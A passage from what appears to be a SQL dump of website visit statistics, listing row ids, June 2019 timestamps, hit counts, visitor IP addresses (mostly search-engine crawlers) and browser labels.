,1559738611,1,1,0,0,'213.180.203.48','other'),(425584,1559738635,1,1,0,0,'157.55.39.181','other'),(425585,1559738976,1,1,0,0,'66.249.66.83','chrome'),(425586,1559740010,2,2,0,0,'91.90.23.250','chrome'),(425587,1559740588,1,1,0,0,'40.77.167.34','other'),(425588,1559740623,1,1,0,0,'157.55.39.244','other'),(425589,1559741279,1,1,0,0,'207.46.13.94','other'),(425590,1559741421,1,1,0,0,'66.249.66.81','chrome'),(425591,1559742412,1,1,0,0,'46.211.66.233','chrome'),(425592,1559742524,1,1,0,0,'207.46.13.94','other'),(425593,1559743613,1,1,0,0,'66.249.66.82','chrome'),(425594,1559745487,1,1,0,0,'157.55.39.211','other'),(425595,1559745786,1,1,0,0,'37.9.113.148','other'),(425596,1559746049,1,1,0,0,'66.249.66.222','chrome'),(425597,1559746118,1,1,0,0,'66.249.66.220','chrome'),(425598,1559746399,1,1,0,0,'157.55.39.181','other'),(425599,1559746561,1,1,0,0,'66.249.66.218','chrome'),(425600,1559746951,1,1,0,0,'8.29.198.25','other'),(425601,1559747772,1,1,0,0,'8.29.198.27','other'),(425602,1559748099,1,1,0,0,'66.249.66.222','chrome'),(425603,1559749298,2,2,0,0,'157.55.39.181','other'),(425604,1559749986,1,1,0,0,'46.219.85.71','other'),(425605,1559750345,1,1,0,0,'157.55.39.246','other'),(425606,1559750878,2,2,0,0,'66.249.66.222','chrome'),(425607,1559751068,1,1,0,0,'37.9.113.148','other'),(425608,1559751478,1,1,0,0,'213.180.203.53','other'),(425609,1559751572,1,1,0,0,'91.225.201.50','firefox'),(425610,1559751647,2,2,0,0,'40.77.167.76','other'),(425611,1559752287,1,1,0,0,'157.55.39.181','other'),(425612,1559752905,1,1,0,0,'5.45.207.76','other'),(425613,1559753551,1,1,0,0,'40.77.167.76','other'),(425614,1559753649,1,1,0,0,'5.45.207.79','other'),(425615,1559754061,1,1,0,0,'207.46.13.62','other'),(425616,1559754199,1,1,0,0,'95.108.213.50','other'),(425617,1559754480,1,1,0,0,'157.55.39.181','other'),(425618,1559755505,1,1,0,0,'157.55.39.181','other'),(425619,1559756084,2,2,0,0,'40.77.167.15','other'),(425620,1559757483,1,1,0,0,'40.77.167.15','other'),(425621,1559757803,2,2,0,0,'8.29.198.26','other'),(425622,1559758152,1,1,0,0,'40.77.167.153','other'),(425623,1559758599,2,2,0,0,'157.55.39.66','other'),(425624,1559758693,1,1,0,0,'207.46.13.62','other'),(425625,1559759848,2,2,0,0,'157.55.39.66','other'),(425626,1559759852,2,2,0,0,'207.46.13.109','other'),(425627,1559759857,1,1,0,0,'40.77.167.153','other'),(425628,1559760060,1,1,0,0,'66.249.66.130','chrome'),(425629,1559760203,1,1,0,0,'178.154.171.69','other'),(425630,1559763102,1,1,0,0,'178.154.244.21','other'),(425631,1559763427,1,1,0,0,'95.132.135.97','chrome'),(425632,1559764134,1,1,0,0,'40.77.167.153','other'),(425633,1559764484,1,1,0,0,'157.55.39.51','other'),(425634,1559765592,1,1,0,0,'207.46.13.109','other'),(425635,1559765699,1,1,0,0,'87.250.224.99','other'),(425636,1559766404,1,1,0,0,'207.46.13.115','other'),(425637,1559767786,1,1,0,0,'66.249.66.218','chrome'),(425638,1559768360,2,2,0,0,'207.46.13.109','other'),(425639,1559768650,1,1,0,0,'8.29.198.25','other'),(425640,1559769081,1,1,0,0,'51.77.52.160','chrome'),(425641,1559769457,1,1,0,0,'8.29.198.26','other'),(425642,1559770651,1,1,0,0,'212.92.98.148','other'),(425643,1559771742,1,1,0,0,'180.76.15.28','other'),(425644,1559773151,1,1,0,0,'66.249.66.220','chrome'),(425645,1559774026,1,1,0,0,'213.180.203.61','other'),(425646,1559774828,1,1,0,0,'5.255.253.22','other'),(425647,1559774884,1,1,0,0,'66.249.66.218','chrome'),(425648,1559775071,1,1,0,0,'157.55.39.145','other'),(425649,1559775299,1,1,0,0,'66.249.66.130','chrome'),(425650,1559775973,1,1,0,0,'66.249.66.222','chrome'),(425651,1559776321,1,1,0,0,'66.249.66.220','chrome'),(425652,1559776403,1,1,0,0,'207.46.13.45','other'),(425653,1559777219,1,1,0,0,'5.45.207.76','other'),(425654,1559778064,1,1,0,0,'207.46.13.45','other'),(425655,1559779500,1,1,0,0,'8.29.198.26','other'),(425656,1559780298,1,1,0,0,'8.29.198.27','other'),(425657,1559781119,1,1,0,0,'207.46.13.45','other'),(425658,1559782072,1,1,0,0,'95.108.213.50','other'),(425659,1559782359,1,1,0,0,'207.46.13.115','other'),(425660,1559782808,2,2,0,0,'66.249.66.218','chrome'),(425661,1559783485,1,1,0,0,'157.55.39.145','other'),(425662,1559785278,1,1,0,0,'66.249.66.218','chrome'),(425663,1559785811,1,1,0,0,'173.193.191.202','firefox'),(425664,1559785827,2,2,0,0,'5.255.253.16','other'),(425665,1559785931,1,1,0,0,'178.154.200.8','other'),(425666,1559786343,1,1,0,0,'207.46.13.45','other'),(425667,1559786600,1,1,0,0,'66.249.66.222','chrome'),(425668,1559786619,2,2,0,0,'66.249.66.220','chrome'),(425669,1559787535,1,1,0,0,'207.46.13.69','other'),(425670,1559787931,1,1,0,0,'5.255.253.22','other'),(425671,1559787969,1,1,0,0,'66.249.66.218','chrome'),(425672,1559787971,1,1,0,0,'5.255.253.16','other'),(425673,1559787974,1,1,0,0,'178.154.171.24','other'),(425674,1559788003,1,1,0,0,'37.9.113.103','other'),(425675,1559788889,1,1,0,0,'207.46.13.69','other'),(425676,1559789681,1,1,0,0,'207.46.13.101','other'),(425677,1559789975,1,1,0,0,'207.46.13.115','other'),(425678,1559790185,1,1,0,0,'185.234.219.246','firefox'),(425679,1559790346,1,1,0,0,'8.29.198.27','other'),(425680,1559791057,2,2,0,0,'157.55.39.241','other'),(425681,1559791149,1,1,0,0,'8.29.198.25','other'),(425682,1559791748,1,1,0,0,'207.46.13.101','other'),(425683,1559792742,1,1,0,0,'66.249.66.132','chrome'),(425684,1559794077,1,1,0,0,'207.46.13.219','other'),(425685,1559795417,1,1,0,0,'157.55.39.241','other'),(425686,1559795633,1,1,0,0,'66.249.66.128','chrome'),(425687,1559795673,1,1,0,0,'207.46.13.219','other'),(425688,1559796649,2,2,0,0,'207.46.13.101','other'),(425689,1559797552,1,1,0,0,'178.154.244.21','other'),(425690,1559799152,1,1,0,0,'185.220.101.46','other'),(425691,1559799253,1,1,0,0,'66.249.66.218','chrome'),(425692,1559799801,1,1,0,0,'66.249.66.222','chrome'),(425693,1559800325,1,1,0,0,'91.197.217.11','chrome'),(425694,1559800340,1,1,0,0,'207.46.13.101','other'),(425695,1559800412,1,1,0,0,'54.244.70.104','chrome'),(425696,1559801209,1,1,0,0,'8.29.198.25','other'),(425697,1559801585,1,1,0,0,'66.249.66.132','chrome'),(425698,1559801763,2,2,0,0,'207.46.13.69','other'),(425699,1559801986,1,1,0,0,'8.29.198.26','other'),(425700,1559802771,1,1,0,0,'178.154.244.11','other'),(425701,1559803246,1,1,0,0,'66.249.66.222','chrome'),(425702,1559803309,1,1,0,0,'66.249.66.220','chrome'),(425703,1559803324,1,1,0,0,'91.196.178.76','chrome'),(425704,1559804006,2,2,0,0,'207.46.13.69','other'),(425705,1559804335,1,1,0,0,'207.46.13.101','other'),(425706,1559804393,1,1,0,0,'40.77.167.48','other'),(425707,1559804488,1,1,0,0,'141.8.142.191','other'),(425708,1559804497,1,1,0,0,'91.196.178.76','chrome'),(425709,1559804885,1,1,0,0,'66.249.66.222','chrome'),(425710,1559804940,2,2,0,0,'207.46.13.69','other'),(425711,1559805499,1,0,1,0,'66.249.66.218',''),(425712,1559806115,3,3,0,0,'40.77.167.48','other'),(425713,1559806120,1,1,0,0,'207.46.13.101','other'),(425714,1559806121,1,1,0,0,'91.196.178.77','chrome'),(425715,1559806125,2,2,0,0,'207.46.13.7','other'),(425716,1559806596,1,1,0,0,'178.154.244.11','other'),(425717,1559806831,1,1,0,0,'46.201.180.96','chrome'),(425718,1559806876,1,1,0,0,'66.249.66.220','chrome'),(425719,1559807793,1,1,0,0,'207.46.13.101','other'),(425720,1559808176,1,1,0,0,'66.249.66.220','chrome'),(425721,1559808680,1,1,0,0,'178.94.243.236','chrome'),(425722,1559808886,1,1,0,0,'91.196.178.180','chrome'),(425723,1559808934,1,1,0,0,'95.108.181.96','other'),(425724,1559808989,1,1,0,0,'40.77.167.48','other'),(425725,1559809114,1,1,0,0,'207.46.13.7','other'),(425726,1559809692,1,1,0,0,'77.109.30.24','chrome'),(425727,1559810772,1,1,0,0,'157.55.39.136','other'),(425728,1559811003,1,1,0,0,'141.8.142.103','other'),(425729,1559811063,1,1,0,0,'91.196.178.76','chrome'),(425730,1559811201,1,1,0,0,'40.77.167.48','other'),(425731,1559812056,1,1,0,0,'8.29.198.27','other'),(425732,1559812829,1,1,0,0,'8.29.198.26','other'),(425733,1559812957,1,1,0,0,'178.154.244.11','other'),(425734,1559814325,1,1,0,0,'66.249.66.222','chrome'),(425735,1559814565,1,1,0,0,'157.55.39.136','other'),(425736,1559814901,1,1,0,0,'5.45.207.19','other'),(425737,1559815374,1,1,0,0,'217.24.169.184','firefox'),(425738,1559815729,1,1,0,0,'207.46.13.190','other'),(425739,1559816369,1,1,0,0,'109.74.154.72','chrome'),(425740,1559816454,1,1,0,0,'66.249.66.132','chrome'),(425741,1559816582,1,1,0,0,'66.249.66.222','chrome'),(425742,1559816739,1,1,0,0,'46.211.27.223','chrome'),(425743,1559818325,2,2,0,0,'66.249.66.132','chrome'),(425744,1559819036,2,2,0,0,'207.46.13.190','other'),(425745,1559819127,1,1,0,0,'66.249.66.222','chrome'),(425746,1559819145,1,1,0,0,'66.249.66.220','chrome'),(425747,1559819247,1,1,0,0,'66.249.66.128','chrome'),(425748,1559819825,1,1,0,0,'174.138.61.179','other'),(425749,1559819832,1,1,0,0,'157.55.39.136','other'),(425750,1559819978,1,1,0,0,'94.100.221.234','chrome'),(425751,1559820413,1,1,0,0,'91.196.178.71','chrome'),(425752,1559820925,2,2,0,0,'66.249.66.222','chrome'),(425753,1559821207,1,1,0,0,'207.46.13.157','other'),(425754,1559821380,1,1,0,0,'207.46.13.190','other'),(425755,1559821856,1,1,0,0,'66.249.66.128','chrome'),(425756,1559822439,1,1,0,0,'174.138.63.241','other'),(425757,1559822764,1,1,0,0,'207.46.13.157','other'),(425758,1559822769,1,1,0,0,'5.45.207.19','other'),(425759,1559822831,1,1,0,0,'5.45.207.79','other'),(425760,1559822898,2,2,0,0,'8.29.198.25','other'),(425761,1559822960,1,1,0,0,'66.249.66.218','chrome'),(425762,1559823026,1,1,0,0,'91.196.178.83','chrome'),(425763,1559824291,1,1,0,0,'180.76.15.140','other'),(425764,1559824555,1,1,0,0,'207.46.13.190','other'),(425765,1559825259,1,1,0,0,'13.66.139.0','other'),(425766,1559825266,1,1,0,0,'91.196.178.83','chrome'),(425767,1559825302,1,1,0,0,'5.45.207.19','other'),(425768,1559826013,1,1,0,0,'66.249.66.130','chrome'),(425769,1559826366,1,1,0,0,'91.196.178.83','chrome'),(425770,1559826679,1,1,0,0,'66.249.66.220','chrome'),(425771,1559826927,1,1,0,0,'66.249.66.222','chrome'),(425772,1559827564,1,1,0,0,'91.196.178.83','chrome'),(425773,1559828307,1,1,0,0,'66.249.66.132','chrome'),(425774,1559828519,1,1,0,0,'207.46.13.190','other'),(425775,1559828638,1,1,0,0,'157.55.39.136','other'),(425776,1559828904,1,1,0,0,'91.209.11.236','other'),(425777,1559829115,1,1,0,0,'40.77.167.146','other'),(425778,1559829365,1,1,0,0,'95.108.213.4','other'),(425779,1559829469,1,1,0,0,'87.250.224.47','other'),(425780,1559829520,1,1,0,0,'141.8.142.103','other'),(425781,1559830094,1,1,0,0,'66.102.9.58','chrome'),(425782,1559830642,1,1,0,0,'66.249.66.130','chrome'),(425783,1559831002,1,1,0,0,'66.249.66.222','chrome'),(425784,1559831080,1,1,0,0,'178.94.92.168','chrome'),(425785,1559831593,1,1,0,0,'66.249.66.218','chrome'),(425786,1559831785,1,1,0,0,'66.249.66.220','chrome'),(425787,1559831884,1,1,0,0,'5.255.253.22','other'),(425788,1559832071,1,1,0,0,'66.249.66.222','chrome'),(425789,1559832451,2,2,0,0,'40.77.167.146','other'),(425790,1559832887,1,1,0,0,'66.249.66.132','chrome'),(425791,1559832914,2,2,0,0,'66.249.66.220','chrome'),(425792,1559833079,3,3,0,0,'66.249.66.218','chrome'),(425793,1559833741,2,2,0,0,'8.29.198.27','other'),(425794,1559833775,1,1,0,0,'66.249.66.222','chrome'),(425795,1559833899,1,1,0,0,'40.77.167.219','other'),(425796,1559834093,1,1,0,0,'66.249.66.128','chrome'),(425797,1559834225,3,3,0,0,'66.249.66.130','chrome'),(425798,1559834885,2,2,0,0,'66.249.66.218','chrome'),(425799,1559834887,4,4,0,0,'66.249.66.220','chrome'),(425800,1559835312,1,1,0,0,'66.249.66.222','chrome'),(425801,1559836942,1,1,0,0,'66.249.66.132','chrome'),(425802,1559837325,1,1,0,0,'207.46.13.38','other'),(425803,1559837775,1,1,0,0,'5.45.207.80','other'),(425804,1559837785,2,2,0,0,'66.249.66.222','chrome'),(425805,1559837896,1,1,0,0,'40.77.167.219','other'),(425806,1559838254,1,1,0,0,'66.249.66.128','chrome'),(425807,1559839063,1,1,0,0,'40.77.167.146','other'),(425808,1559839814,1,1,0,0,'107.21.1.8','other'),(425809,1559839815,1,1,0,0,'54.208.102.37','other'),(425810,1559839872,1,1,0,0,'40.77.167.219','other'),(425811,1559840229,1,1,0,0,'207.46.13.38','other'),(425812,1559840437,1,1,0,0,'66.249.66.220','chrome'),(425813,1559841272,1,1,0,0,'141.8.142.162','other'),(425814,1559841299,1,1,0,0,'87.250.224.47','other'),(425815,1559842382,1,1,0,0,'66.249.66.218','chrome'),(425816,1559843115,2,2,0,0,'207.46.13.38','other'),(425817,1559844519,1,1,0,0,'66.249.66.218','chrome'),(425818,1559844537,1,1,0,0,'66.249.66.130','chrome'),(425819,1559844609,1,1,0,0,'8.29.198.26','other'),(425820,1559844689,1,1,0,0,'40.77.167.219','other'),(425821,1559845439,1,1,0,0,'8.29.198.27','other'),(425822,1559846231,2,2,0,0,'66.249.66.220','chrome'),(425823,1559847907,2,2,0,0,'207.46.13.66','other'),(425824,1559848120,1,1,0,0,'40.77.167.146','other'),(425825,1559848787,1,1,0,0,'91.196.178.132','chrome'),(425826,1559849185,1,1,0,0,'40.77.167.146','other'),(425827,1559849724,1,1,0,0,'141.8.142.162','other'),(425828,1559850501,1,1,0,0,'40.77.167.219','other'),(425829,1559852606,1,1,0,0,'40.77.167.164','other'),(425830,1559853044,1,1,0,0,'66.249.66.220','chrome'),(425831,1559853237,1,1,0,0,'13.66.139.0','other'),(425832,1559853932,1,1,0,0,'78.111.188.1','chrome'),(425833,1559854217,1,1,0,0,'95.108.181.57','other'),(425834,1559854461,1,1,0,0,'5.45.207.19','other'),(425835,1559854692,1,1,0,0,'40.77.167.28','other'),(425836,1559855467,2,2,0,0,'8.29.198.27','other'),(425837,1559857593,1,1,0,0,'109.201.154.207','other'),(425838,1559857601,1,1,0,0,'109.201.154.232','other'),(425839,1559857764,1,1,0,0,'157.55.39.63','other'),(425840,1559857868,1,1,0,0,'40.77.167.153','other'),(425841,1559857938,1,1,0,0,'95.108.181.94','other'),(425842,1559859086,1,1,0,0,'207.46.13.83','other'),(425843,1559860705,1,1,0,0,'66.249.66.132','chrome'),(425844,1559861278,28,28,0,0,'78.46.90.53','other'),(425845,1559861976,1,1,0,0,'5.9.77.102','other'),(425846,1559861991,1,1,0,0,'207.46.13.83','other'),(425847,1559863392,1,1,0,0,'157.55.39.63','other'),(425848,1559863777,1,1,0,0,'5.45.207.79','other'),(425849,1559866107,1,1,0,0,'178.154.244.11','other'),(425850,1559866310,1,1,0,0,'8.29.198.25','other'),(425851,1559866905,1,1,0,0,'40.77.167.28','other'),(425852,1559867065,1,1,0,0,'87.250.224.47','other'),(425853,1559867163,1,1,0,0,'8.29.198.26','other'),(425854,1559867185,1,1,0,0,'141.8.142.103','other'),(425855,1559868100,1,1,0,0,'40.77.167.153','other'),(425856,1559869659,1,1,0,0,'178.154.244.49','other'),(425857,1559869867,1,1,0,0,'40.77.167.153','other'),(425858,1559870284,1,1,0,0,'157.55.39.63','other'),(425859,1559870670,1,1,0,0,'66.249.66.218','chrome'),(425860,1559871159,4,4,0,0,'178.63.11.212','other'),(425861,1559872330,17,17,0,0,'144.76.120.197','other'),(425862,1559874411,1,1,0,0,'109.63.220.49','msie'),(425863,1559874657,1,1,0,0,'87.250.224.65','other'),(425864,1559874848,21,21,0,0,'148.251.49.107','other'),(425865,1559874957,192,192,0,0,'144.76.120.197','other'),(425866,1559875161,1,1,0,0,'193.106.30.98','chrome'),(425867,1559876682,1,1,0,0,'141.8.132.16','other'),(425868,1559877167,1,1,0,0,'8.29.198.27','other'),(425869,1559877580,1,1,0,0,'66.249.66.128','chrome'),(425870,1559877821,2,2,0,0,'141.8.142.103','other'),(425871,1559878012,1,1,0,0,'8.29.198.26','other'),(425872,1559878416,1,1,0,0,'5.45.207.79','other'),(425873,1559878605,1,1,0,0,'178.154.244.11','other'),(425874,1559879118,1,1,0,0,'157.55.39.106','other'),(425875,1559879389,1,1,0,0,'95.108.213.4','other'),(425876,1559880298,1,1,0,0,'91.196.178.77','firefox'),(425877,1559880497,1,1,0,0,'40.77.167.40','other'),(425878,1559880542,1,1,0,0,'178.154.244.11','other'),(425879,1559880602,1,1,0,0,'37.9.113.148','other'),(425880,1559880624,1,1,0,0,'5.45.207.19','other'),(425881,1559882253,1,1,0,0,'5.45.207.79','other'),(425882,1559882607,1,1,0,0,'5.45.207.19','other'),(425883,1559883065,1,1,0,0,'178.154.244.65','other'),(425884,1559884491,1,1,0,0,'40.77.167.40','other'),(425885,1559884773,1,1,0,0,'95.108.213.4','other'),(425886,1559884828,2,2,0,0,'91.196.178.92','chrome'),(425887,1559885177,1,1,0,0,'178.154.244.11','other'),(425888,1559885200,1,1,0,0,'185.220.101.65','other'),(425889,1559886110,1,1,0,0,'157.55.39.86','other'),(425890,1559886404,2,2,0,0,'40.77.167.40','other'),(425891,1559886988,1,1,0,0,'94.178.137.25','chrome'),(425892,1559887499,3,3,0,0,'40.77.167.139','other'),(425893,1559887935,1,1,0,0,'40.77.167.40','other'),(425894,1559888023,2,2,0,0,'8.29.198.25','other'),(425895,1559888440,1,1,0,0,'180.76.15.134','other'),(425896,1559888446,1,1,0,0,'13.66.139.0','other'),(425897,1559889014,1,1,0,0,'40.77.167.138','other'),(425898,1559889484,1,1,0,0,'40.77.167.172','other'),(425899,1559889827,1,1,0,0,'95.134.195.142','chrome'),(425900,1559890311,1,1,0,0,'46.211.129.106','chrome'),(425901,1559890515,1,1,0,0,'176.111.33.18','chrome'),(425902,1559890654,1,1,0,0,'40.77.167.139','other'),(425903,1559891614,1,1,0,0,'176.111.33.18','chrome'),(425904,1559891839,3,3,0,0,'157.55.39.117','other'),(425905,1559892134,1,1,0,0,'81.162.247.151','chrome'),(425906,1559892642,1,1,0,0,'5.45.207.19','other'),(425907,1559892683,1,1,0,0,'178.154.244.11','other'),(425908,1559893505,1,1,0,0,'40.77.167.138','other'),(425909,1559893759,1,1,0,0,'95.134.125.220','chrome'),(425910,1559894551,1,1,0,0,'31.43.13.121','chrome'),(425911,1559895195,1,1,0,0,'40.77.167.138','other'),(425912,1559896158,1,1,0,0,'5.45.207.79','other'),(425913,1559896620,2,2,0,0,'176.118.49.21','chrome'),(425914,1559897984,1,1,0,0,'66.249.66.222','chrome'),(425915,1559898287,1,1,0,0,'40.77.167.65','other'),(425916,1559898348,1,1,0,0,'94.100.221.234','chrome'),(425917,1559898470,1,1,0,0,'91.196.178.65','firefox'),(425918,1559898870,1,1,0,0,'8.29.198.25','other'),(425919,1559899349,1,1,0,0,'87.250.224.47','other'),(425920,1559899733,1,1,0,0,'8.29.198.26','other'),(425921,1559900002,1,1,0,0,'40.77.167.127','other'),(425922,1559900309,1,1,0,0,'109.201.154.135','other'),(425923,1559900655,1,1,0,0,'66.249.66.222','chrome'),(425924,1559901208,2,2,0,0,'40.77.167.127','other'),(425925,1559901658,1,1,0,0,'109.74.154.72','chrome'),(425926,1559901903,1,1,0,0,'40.77.167.115','other'),(425927,1559902096,1,1,0,0,'5.45.207.79','other'),(425928,1559903504,2,2,0,0,'157.55.39.117','other'),(425929,1559903884,1,1,0,0,'40.77.167.127','other'),(425930,1559903975,1,1,0,0,'66.249.66.128','chrome'),(425931,1559904244,1,1,0,0,'91.196.178.190','chrome'),(425932,1559904735,1,1,0,0,'66.249.66.218','chrome'),(425933,1559905310,1,1,0,0,'5.45.207.79','other'),(425934,1559905315,1,1,0,0,'23.100.232.233','msie'),(425935,1559905491,1,1,0,0,'188.239.237.90','chrome'),(425936,1559905855,1,1,0,0,'91.196.178.48','chrome'),(425937,1559906553,1,1,0,0,'207.46.13.109','other'),(425938,1559906775,1,1,0,0,'66.249.66.222','chrome'),(425939,1559907200,1,1,0,0,'91.196.178.70','chrome'),(425940,1559907566,1,1,0,0,'91.196.178.83','chrome'),(425941,1559907982,1,1,0,0,'95.134.189.12','chrome'),(425942,1559908166,1,1,0,0,'23.100.232.233','msie'),(425943,1559908634,3,3,0,0,'178.154.244.11','other'),(425944,1559909213,1,1,0,0,'95.108.213.4','other'),(425945,1559909743,1,1,0,0,'8.29.198.27','other'),(425946,1559910561,1,1,0,0,'23.100.232.233','msie'),(425947,1559910595,1,1,0,0,'8.29.198.25','other'),(425948,1559911095,1,1,0,0,'207.46.13.54','other'),(425949,1559911208,1,1,0,0,'207.46.13.111','other'),(425950,1559911750,2,2,0,0,'40.77.167.104','other'),(425951,1559911987,1,1,0,0,'91.196.178.83','chrome'),(425952,1559912018,1,1,0,0,'207.46.13.54','other'),(425953,1559912532,1,1,0,0,'46.166.190.159','other'),(425954,1559912637,1,1,0,0,'91.196.177.207','chrome'),(425955,1559913243,1,1,0,0,'5.45.207.79','other'),(425956,1559914555,1,1,0,0,'207.46.13.111','other'),(425957,1559914791,1,1,0,0,'91.196.178.67','chrome'),(425958,1559915973,1,1,0,0,'23.100.232.233','msie'),(425959,1559917647,2,2,0,0,'40.77.167.131','other'),(425960,1559917677,1,1,0,0,'207.46.13.54','other'),(425961,1559917933,1,1,0,0,'87.250.224.65','other'),(425962,1559918627,1,1,0,0,'178.154.244.11','other'),(425963,1559918638,1,1,0,0,'5.45.207.19','other'),(425964,1559919458,1,1,0,0,'207.46.13.54','other'),(425965,1559920569,1,1,0,0,'95.108.181.75','other'),(425966,1559920613,1,1,0,0,'209.17.97.106','other'),(425967,1559920615,2,2,0,0,'8.29.198.25','other'),(425968,1559921534,1,1,0,0,'178.154.171.24','other'),(425969,1559923443,1,1,0,0,'37.9.113.148','other'),(425970,1559923463,1,1,0,0,'207.46.13.54','other'),(425971,1559923905,1,1,0,0,'40.77.167.104','other'),(425972,1559924681,2,2,0,0,'193.194.124.167','chrome'),(425973,1559925551,1,1,0,0,'157.55.39.132','other'),(425974,1559925560,3,3,0,0,'207.46.13.111','other'),(425975,1559925564,2,2,0,0,'207.46.13.54','other'),(425976,1559926051,1,1,0,0,'40.77.167.127','other'),(425977,1559926582,1,1,0,0,'207.46.13.54','other'),(425978,1559927341,1,1,0,0,'40.77.167.127','other'),(425979,1559927571,1,1,0,0,'207.46.13.111','other'),(425980,1559928044,1,1,0,0,'46.166.190.136','other'),(425981,1559928064,1,1,0,0,'46.166.190.165','other'),(425982,1559928323,1,1,0,0,'91.209.11.236','other'),(425983,1559929035,1,1,0,0,'40.77.167.127','other'),(425984,1559929886,1,1,0,0,'207.46.13.64','other'),(425985,1559930599,1,1,0,0,'40.77.167.127','other'),(425986,1559931469,2,2,0,0,'8.29.198.26','other'),(425987,1559931959,1,1,0,0,'209.17.97.58','other'),(425988,1559932090,1,1,0,0,'5.45.207.19','other'),(425989,1559932215,1,1,0,0,'207.46.13.54','other'),(425990,1559932591,1,1,0,0,'39.99.33.165','other'),(425991,1559933349,1,1,0,0,'158.69.54.207','other'),(425992,1559933415,1,1,0,0,'158.69.54.207','chrome'),(425993,1559933742,1,1,0,0,'51.77.246.199','other'),(425994,1559933860,1,1,0,0,'66.249.66.218','chrome'),(425995,1559934417,1,1,0,0,'207.46.13.175','other'),(425996,1559934529,1,1,0,0,'5.45.207.19','other'),(425997,1559936128,1,1,0,0,'207.46.13.186','other'),(425998,1559936747,1,1,0,0,'40.77.167.127','other'),(425999,1559937066,1,1,0,0,'207.46.13.175','other'),(426000,1559937261,1,1,0,0,'207.46.13.251','other'),(426001,1559937402,1,1,0,0,'178.154.244.11','other'),(426002,1559938236,1,1,0,0,'5.45.207.19','other'),(426003,1559939841,1,1,0,0,'13.66.139.0','other'),(426004,1559939979,1,1,0,0,'5.45.207.79','other'),(426005,1559940005,2,2,0,0,'69.58.178.59','other'),(426006,1559940046,1,1,0,0,'66.249.66.222','chrome'),(426007,1559940148,1,1,0,0,'207.46.13.175','other'),(426008,1559940282,1,1,0,0,'40.77.167.127','other'),(426009,1559940522,1,1,0,0,'95.108.181.54','other'),(426010,1559940624,2,2,0,0,'157.55.39.166','other'),(426011,1559940867,1,1,0,0,'207.46.13.253','other'),(426012,1559941848,1,1,0,0,'5.45.207.79','other'),(426013,1559941851,1,1,0,0,'178.154.244.11','other'),(426014,1559941891,1,1,0,0,'66.249.66.220','chrome'),(426015,1559942353,2,2,0,0,'8.29.198.27','other'),(426016,1559942375,1,1,0,0,'207.46.13.103','other'),(426017,1559943081,1,1,0,0,'40.77.167.56','other'),(426018,1559944124,1,1,0,0,'5.45.207.79','other'),(426019,1559946902,1,1,0,0,'157.55.39.54','other'),(426020,1559949582,1,1,0,0,'13.66.139.0','other'),(426021,1559950928,1,1,0,0,'207.46.13.59','other'),(426022,1559951256,1,1,0,0,'66.249.66.222','chrome'),(426023,1559951534,1,1,0,0,'207.46.13.103','other'),(426024,1559951867,1,1,0,0,'207.46.13.166','other'),(426025,1559952748,1,1,0,0,'207.46.13.239','other'),(426026,1559952750,2,2,0,0,'40.77.167.228','other'),(426027,1559953085,1,1,0,0,'66.249.66.220','chrome'),(426028,1559953216,1,1,0,0,'8.29.198.25','other'),(426029,1559953715,1,1,0,0,'207.46.13.134','other'),(426030,1559954028,1,1,0,0,'8.29.198.26','other'),(426031,1559954798,3,3,0,0,'207.46.13.161','other'),(426032,1559955866,1,1,0,0,'40.77.167.209','other'),(426033,1559955963,1,1,0,0,'66.249.69.58','chrome'),(426034,1559955974,1,1,0,0,'66.249.69.60','chrome'),(426035,1559956176,1,1,0,0,'157.55.39.72','other'),(426036,1559957176,1,1,0,0,'66.249.69.60','chrome'),(426037,1559957229,2,2,0,0,'66.249.69.62','chrome'),(426038,1559957560,1,1,0,0,'66.249.69.58','chrome'),(426039,1559957849,2,2,0,0,'178.154.244.49','other'),(426040,1559958158,1,1,0,0,'40.77.167.209','other'),(426041,1559958162,1,1,0,0,'40.77.167.214','other'),(426042,1559958473,1,1,0,0,'157.55.39.72','other'),(426043,1559958860,1,1,0,0,'157.55.39.48','other'),(426044,1559959347,1,1,0,0,'207.46.13.69','other'),(426045,1559959523,1,1,0,0,'144.76.67.250','other'),(426046,1559959828,1,1,0,0,'66.249.69.60','chrome'),(426047,1559960252,1,1,0,0,'5.45.207.19','other'),(426048,1559960941,2,2,0,0,'207.46.13.69','other'),(426049,1559962543,1,1,0,0,'91.196.178.184','chrome'),(426050,1559963167,31,31,0,0,'144.76.67.250','other'),(426051,1559963440,1,1,0,0,'207.46.13.69','other'),(426052,1559964074,4,4,0,0,'144.76.67.250','other'),(426053,1559964084,2,2,0,0,'8.29.198.26','other'),(426054,1559964135,5,5,0,0,'157.55.39.48','other'),(426055,1559964724,1,1,0,0,'207.46.13.199','other'),(426056,1559964996,3,3,0,0,'144.76.67.250','other'),(426057,1559965007,1,1,0,0,'5.45.207.79','other'),(426058,1559965088,2,2,0,0,'207.46.13.69','other'),(426059,1559965697,1,1,0,0,'207.46.13.199','other'),(426060,1559965942,6,6,0,0,'144.76.67.250','other'),(426061,1559966846,68,68,0,0,'144.76.67.250','other'),(426062,1559967246,1,1,0,0,'5.45.207.79','other'),(426063,1559967755,27,27,0,0,'144.76.67.250','other'),(426064,1559967845,1,1,0,0,'207.46.13.234','other'),(426065,1559967884,1,1,0,0,'207.46.13.193','other'),(426066,1559968663,5,5,0,0,'144.76.67.250','other'),(426067,1559968690,1,1,0,0,'40.77.167.103','other'),(426068,1559970063,1,1,0,0,'178.154.244.11','other'),(426069,1559970347,35,35,0,0,'144.76.67.250','other'),(426070,1559971249,5,5,0,0,'144.76.67.250','other'),(426071,1559971352,1,1,0,0,'207.46.13.199','other'),(426072,1559971808,1,1,0,0,'51.15.68.66','other'),(426073,1559972164,10,10,0,0,'144.76.67.250','other'),(426074,1559972926,3,3,0,0,'178.154.244.11','other'),(426075,1559972999,1,1,0,0,'180.76.15.6','other'),(426076,1559973065,8,8,0,0,'144.76.67.250','other'),(426077,1559973154,1,1,0,0,'207.46.13.199','other'),(426078,1559973166,1,1,0,0,'51.158.117.104','other'),(426079,1559973499,1,1,0,0,'207.46.13.234','other'),(426080,1559973977,13,13,0,0,'144.76.67.250','other'),(426081,1559974551,1,1,0,0,'207.46.13.199','other'),(426082,1559974937,1,1,0,0,'8.29.198.25','other'),(426083,1559974999,1,1,0,0,'180.76.15.140','other'),(426084,1559975004,1,1,0,0,'40.77.167.125','other'),(426085,1559975724,3,3,0,0,'144.76.67.250','other'),(426086,1559975728,1,1,0,0,'8.29.198.26','other'),(426087,1559976067,1,1,0,0,'157.55.39.201','other'),(426088,1559976661,77,77,0,0,'144.76.67.250','other'),(426089,1559977000,1,1,0,0,'180.76.15.162','other'),(426090,1559977569,1